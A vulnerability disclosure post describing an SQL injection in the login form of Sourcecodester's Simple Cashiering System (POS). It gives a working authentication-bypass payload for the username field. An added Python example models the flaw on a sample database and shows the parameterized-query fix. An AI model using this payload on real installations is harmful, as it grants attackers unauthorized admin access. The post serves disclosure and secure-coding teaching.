Sourcecodester Simple Cashiering System (POS) unauthenticated SQLi allows authentication bypass with admin privileges
Looking for vulnerabilities in some projects on Sourcecodester, I found the Simple Cashiering System (POS), so I got my environment ready to hunt bugs, and the first one that I found was an SQLi in the login form that allows authentication bypass as admin.
vulnerable URL: http://localhost/cashiering/login.php
affected field: username
payload: admin' or '1'='1--
Note that it is necessary to put something as the password (it can be any character).
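To show why the username field behaves this way and what the fix looks like, here is an added example (not code from the application or from this post) that models the login check in Python with an in-memory SQLite database. The table layout, the sample accounts and the shape of the query are assumptions, since the application's login.php source is not shown here.

```python
import sqlite3

def make_db():
    # Constructed sample data; the application's real schema is an assumption.
    # Passwords are plaintext only to keep the model short; a real fix would
    # also store a salted password hash.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 's3cret-admin', 'admin')")
    db.execute("INSERT INTO users VALUES ('clerk', 'clerk-pass', 'cashier')")
    return db

def login_concatenated(db, username, password):
    # Assumed vulnerable pattern: form input pasted straight into the SQL text.
    sql = ("SELECT username, role FROM users WHERE username='" + username +
           "' AND password='" + password + "'")
    # With the payload from the post, the WHERE clause in this model becomes
    #   username='admin' or '1'='1--' AND password='x'
    # AND binds tighter than OR, so the username test alone selects the admin
    # row and the password comparison no longer matters.
    return db.execute(sql).fetchone()

def login_parameterized(db, username, password):
    # Hardened form: both values are bound as data, so quotes inside them
    # cannot change the structure of the query.
    sql = "SELECT username, role FROM users WHERE username=? AND password=?"
    return db.execute(sql, (username, password)).fetchone()

if __name__ == "__main__":
    db = make_db()
    payload = "admin' or '1'='1--"   # value taken from the post
    print("concatenated :", login_concatenated(db, payload, "x"))
    print("parameterized:", login_parameterized(db, payload, "x"))
    print("valid login  :", login_parameterized(db, "admin", "s3cret-admin"))
```

In the PHP application the equivalent change is to build the login query with prepared statements (mysqli or PDO) instead of string concatenation.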